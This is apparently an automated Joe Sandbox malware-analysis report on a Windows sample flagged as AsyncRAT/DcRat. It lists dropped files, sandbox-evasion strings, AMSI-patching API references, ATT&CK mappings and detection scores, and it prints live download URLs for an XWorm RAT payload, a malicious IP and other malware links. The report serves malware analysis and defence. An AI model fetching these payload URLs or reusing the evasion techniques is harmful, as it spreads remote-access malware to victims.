            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347700BD pushad ; iretd 3_2_00007FFD347700C1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file

            Boot Survival

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Queries memory information (via WMI often done to detect virtual machines)
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.drBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: F40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeWindow / User API: threadDelayed 6041Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeWindow / User API: threadDelayed 3952Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684Thread sleep count: 6041 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684Thread sleep time: -60410000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684Thread sleep count: 3952 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe TID: 6684Thread sleep time: -39520000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe TID: 6232Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: RuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QemU{
            Source: RuntimeBroker.exe, 00000003.00000002.4613101448.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF651793D04 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF651793D04
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF651793EE8 SetUnhandledExceptionFilter,0_2_00007FF651793EE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF651793D04 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF651793D04
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF651793860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF651793860
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: XWormUI[1].exe.0.dr, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
            Source: XWormUI[1].exe.0.dr, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: XWormUI[1].exe.0.dr, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: XWormUI[1].exe.0.dr, Amsi.csReference to suspicious API methods: Win32.VirtualAllocEx(procAddress, (UIntPtr)(ulong)patch.Length, 64u, out var _)
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF651793F5C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF651793F5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeCode function: 0_2_00007FF6517913C0 GetUserNameW,memmove,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6517913C0
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.drBinary or memory string: MSASCui.exe
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.drBinary or memory string: procexp.exe
            Source: RuntimeBroker.exe, 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, XWormUI[1].exe.0.dr, RuntimeBroker.exe.0.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected DcRat
            Source: Yara matchFile source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DcRat
            Source: Yara matchFile source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		1
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Query Registry            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API            		Logon Script (Windows)1
            DLL Side-Loading            		1
            Disable or Modify Tools            		Security Account Manager321
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Process Injection            		NTDS2
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Obfuscated Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging3
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            Account Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Owner/User Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe45%ReversingLabsWin64.Backdoor.Asyncrat
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe59%VirustotalBrowse
            SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe100%AviraBDS/Redcap.slbem

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe100%AviraHEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%AviraHEUR/AGEN.1305769
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe96%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe72%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe96%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe72%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            github.com0%VirustotalBrowse
            raw.githubusercontent.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://raw.githubusercontent.com/a1%VirustotalBrowse
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloade1%VirustotalBrowse
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe3%VirustotalBrowse
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe4%VirustotalBrowse
            https://raw.githubusercontent.com/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            github.com
            		140.82.121.3
            		truefalseunknown
            raw.githubusercontent.com
            		185.199.111.133
            		truefalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exefalseunknown
            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exefalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/e.bSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeWYLSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeA4zSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe0SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://github.com/3;CSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exerSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exemYjSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exetXaSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://raw.githubusercontent.com/aSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloadeSecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exefalseunknown
                            https://github.com/D;SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://raw.githubusercontent.com/SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              37.18.62.18
                              		unknownNetherlands
                              		203714FLEXLTD-ASRUtrue
                              140.82.121.3
                              		github.comUnited States
                              		36459GITHUBUSfalse
                              185.199.111.133
                              		raw.githubusercontent.comNetherlands
                              		54113FASTLYUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1522429
                              Start date and time:2024-09-30 03:23:10 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 42s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@3/2@2/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 16
                              • Number of non-executed functions: 9
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              21:24:09API Interceptor5280791x Sleep call for process: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                              • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                              firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                              • github.com/john-xor/temp/blob/main/index.html?raw=true
                              0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                              • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                              MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                              • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                              RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                              • github.com/ssbb36/stv/raw/main/5.mp3
